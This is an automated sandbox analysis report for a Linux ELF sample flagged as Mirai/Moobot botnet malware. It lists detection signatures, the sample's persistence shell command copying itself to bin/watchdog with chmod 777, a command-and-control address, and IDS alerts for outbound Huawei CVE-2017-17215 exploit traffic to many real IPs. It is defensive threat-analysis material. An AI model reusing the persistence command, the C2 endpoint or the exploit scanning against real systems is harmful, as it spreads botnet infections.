Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
lD25Z9LfKe.elf

Overview

General Information

Sample Name:lD25Z9LfKe.elf
Original Sample Name:c929d58b6bb8f66edc985003ba50c3c1.elf
Analysis ID:830684
MD5:c929d58b6bb8f66edc985003ba50c3c1
SHA1:711976261f2f197a341dca8afdb7679f04aa3f99
SHA256:e1366976365db1f2bffdc37d4e64e12f883f9a20e02b12d52b6a1b346b8f0692
Tags:32elfmiraipowerpc
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

General Information

Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830684
Start date and time:2023-03-20 15:58:57 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 23s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:lD25Z9LfKe.elf
Original Sample Name:c929d58b6bb8f66edc985003ba50c3c1.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@2/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: j.xnyidc.top

Runtime Messages

Command:/tmp/lD25Z9LfKe.elf
PID:6224
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:

Process Tree

  • system is lnxubuntu20
  • lD25Z9LfKe.elf (PID: 6224, Parent: 6126, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/lD25Z9LfKe.elf
    • sh (PID: 6226, Parent: 6224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/lD25Z9LfKe.elf bin/watchdog; chmod 777 bin/watchdog"
      • sh New Fork (PID: 6228, Parent: 6226)
      • rm (PID: 6228, Parent: 6226, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 6229, Parent: 6226)
      • mkdir (PID: 6229, Parent: 6226, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6230, Parent: 6226)
      • mv (PID: 6230, Parent: 6226, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/lD25Z9LfKe.elf bin/watchdog
      • sh New Fork (PID: 6231, Parent: 6226)
      • chmod (PID: 6231, Parent: 6226, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
lD25Z9LfKe.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    lD25Z9LfKe.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      lD25Z9LfKe.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0xd33c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd350:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd364:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd378:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd38c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd3a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd3b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd3c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd3dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd3f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd404:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd418:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd42c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd440:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd454:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd468:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd47c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd490:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd4a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd4b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd4cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      6224.1.00007effc4001000.00007effc4011000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6224.1.00007effc4001000.00007effc4011000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6224.1.00007effc4001000.00007effc4011000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0xd33c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd350:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd364:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd378:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd38c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd3a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd3b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd3c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd3dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd3f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd404:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd418:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd42c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd440:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd454:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd468:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd47c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd490:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd4a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd4b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd4cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: lD25Z9LfKe.elf PID: 6224JoeSecurity_MoobotYara detected MoobotJoe Security
            Process Memory Space: lD25Z9LfKe.elf PID: 6224Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x3754:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3768:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x377c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3790:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x37a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x37b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x37cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x37e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x37f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3808:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x381c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3830:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3844:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3858:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x386c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3880:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3894:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x38a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x38bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x38d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x38e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

            Snort Signatures

            Timestamp:192.168.2.238.8.8.833891532023883 03/20/23-15:59:46.829796
            SID:2023883
            Source Port:33891
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.2341.37.68.24642302372152835222 03/20/23-16:00:54.853824
            SID:2835222
            Source Port:42302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23192.119.137.7457754372152835222 03/20/23-16:01:50.220586
            SID:2835222
            Source Port:57754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:156.224.24.249192.168.2.2356999478282030489 03/20/23-16:01:45.327043
            SID:2030489
            Source Port:56999
            Destination Port:47828
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.39.222.15245430372152835222 03/20/23-16:01:18.217927
            SID:2835222
            Source Port:45430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:156.224.24.249192.168.2.2356999477962030489 03/20/23-16:00:44.195958
            SID:2030489
            Source Port:56999
            Destination Port:47796
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.214.98.3835290372152835222 03/20/23-16:00:31.085625
            SID:2835222
            Source Port:35290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23141.117.56.18059180372152835222 03/20/23-16:01:09.639143
            SID:2835222
            Source Port:59180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.224.24.24947828569992030490 03/20/23-16:00:49.583605
            SID:2030490
            Source Port:47828
            Destination Port:56999
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2334.117.1.25340848372152835222 03/20/23-16:00:17.642577
            SID:2835222
            Source Port:40848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.167.148.13246324372152835222 03/20/23-16:00:41.668931
            SID:2835222
            Source Port:46324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2341.237.49.24132970372152835222 03/20/23-16:00:38.463363
            SID:2835222
            Source Port:32970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2341.234.87.5138528372152835222 03/20/23-16:01:07.497528
            SID:2835222
            Source Port:38528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2341.236.241.24052042372152835222 03/20/23-16:01:35.636258
            SID:2835222
            Source Port:52042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.234.59.6833038372152835222 03/20/23-16:00:22.715968
            SID:2835222
            Source Port:33038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2341.34.164.7957718372152835222 03/20/23-15:59:50.971789
            SID:2835222
            Source Port:57718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.238.8.8.859786532023883 03/20/23-16:00:49.089429
            SID:2023883
            Source Port:59786
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.2320.28.196.13955414372152835222 03/20/23-16:01:13.960170
            SID:2835222
            Source Port:55414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.224.24.24947796569992030490 03/20/23-15:59:47.422349
            SID:2030490
            Source Port:47796
            Destination Port:56999
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: lD25Z9LfKe.elfVirustotal: Detection: 60%Perma Link
            Source: lD25Z9LfKe.elfReversingLabs: Detection: 61%

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.23:33891 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47796 -> 156.224.24.249:56999
            Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 156.224.24.249:56999 -> 192.168.2.23:47796
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57718 -> 41.34.164.79:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40848 -> 34.117.1.253:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33038 -> 197.234.59.68:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35290 -> 197.214.98.38:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32970 -> 41.237.49.241:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46324 -> 103.167.148.132:37215
            Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.23:59786 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47828 -> 156.224.24.249:56999
            Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 156.224.24.249:56999 -> 192.168.2.23:47828
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42302 -> 41.37.68.246:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38528 -> 41.234.87.51:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59180 -> 141.117.56.180:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55414 -> 20.28.196.139:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45430 -> 197.39.222.152:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52042 -> 41.236.241.240:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57754 -> 192.119.137.74:37215
            Connects to many ports of the same IP (likely port scanning)
            Source: global trafficTCP traffic: 41.34.164.79 ports 1,2,3,5,7,37215
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 57718 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 57718
            Source: unknownNetwork traffic detected: HTTP traffic on port 40848 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33038 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35290 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 32970 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 32970
            Source: unknownNetwork traffic detected: HTTP traffic on port 46324 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42302 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 42302
            Source: unknownNetwork traffic detected: HTTP traffic on port 38528 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 38528
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45430 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 45430
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52042 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52042
            Source: unknownNetwork traffic detected: HTTP traffic on port 57754 -> 37215
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 108.23.15.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.165.92.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 104.153.167.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.42.145.5:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.20.140.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.64.209.101:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.140.236.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.244.59.153:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.97.202.233:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.213.2.53:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.108.8.168:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 151.205.68.245:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.255.112.187:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.160.174.21:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.253.197.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 132.62.148.240:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 12.57.136.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 186.31.201.229:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.175.42.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.202.60.226:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.64.226.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.26.253.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.113.57.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.82.51.24:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 57.109.182.87:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.167.145.206:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.227.157.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.179.174.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.85.238.20:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 73.165.229.133:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.154.6.95:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.194.99.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.166.106.157:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.161.169.80:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.88.149.180:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.25.122.189:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.91.173.234:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.53.184.138:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.26.172.56:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.204.227.45:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.15.82.229:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.251.194.205:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 79.178.176.109:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.199.28.116:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.255.52.105:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.127.210.180:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.13.33.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.223.156.180:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 182.83.22.166:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.34.53.56:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.190.66.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.224.156.109:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 209.212.113.30:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.143.38.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 18.1.233.177:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.69.152.42:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.58.171.0:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.21.64.242:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.205.222.221:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.240.161.132:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.108.232.109:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.89.166.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 216.34.3.69:37215
